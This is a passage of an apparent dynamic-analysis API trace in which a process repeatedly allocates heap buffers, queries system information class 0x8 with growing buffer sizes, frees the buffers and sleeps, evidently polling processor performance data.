SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.286] Sleep (dwMilliseconds=0x110) [0220.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.297] Sleep (dwMilliseconds=0x110) [0220.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.316] Sleep (dwMilliseconds=0x110) [0220.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.331] Sleep (dwMilliseconds=0x110) [0220.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.350] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.351] Sleep (dwMilliseconds=0x110) [0220.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.366] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.367] Sleep (dwMilliseconds=0x110) [0220.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.378] Sleep (dwMilliseconds=0x110) [0220.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.395] Sleep (dwMilliseconds=0x110) [0220.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.406] Sleep (dwMilliseconds=0x110) [0220.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.437] Sleep (dwMilliseconds=0x110) [0220.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.456] Sleep (dwMilliseconds=0x110) [0220.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.475] Sleep (dwMilliseconds=0x110) [0220.481] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.481] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.484] Sleep (dwMilliseconds=0x110) [0220.507] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.507] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.508] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.508] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.509] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.509] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.510] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.510] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.510] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.511] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.511] Sleep (dwMilliseconds=0x110) [0220.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.514] HeapFree (in: 